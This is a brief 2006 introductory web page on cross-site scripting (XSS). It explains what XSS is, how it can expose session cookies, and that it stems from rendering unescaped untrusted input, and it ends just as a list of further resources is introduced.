Cross-Site Scripting Resources

Status: Current   (as of 17 August 2006)

Cross-Site Scripting (commonly abbreviated as XSS) is a security issue that arises when an attacker can cause client-side script (such as JavaScript) of his or her choosing to execute within another user's browser in the context of a given web-site or web-application. This may allow the attacker to steal that user's session cookies for the web-application in question, or otherwise manipulate that user's session context.

XSS vulnerabilities most often arise if a web-application renders data that originated from an untrusted source (such as a query parameter) in a HTML document without carefully validating or escaping that data.

The following online resources provide further information on XSS vulnerabilities and how to avoid them: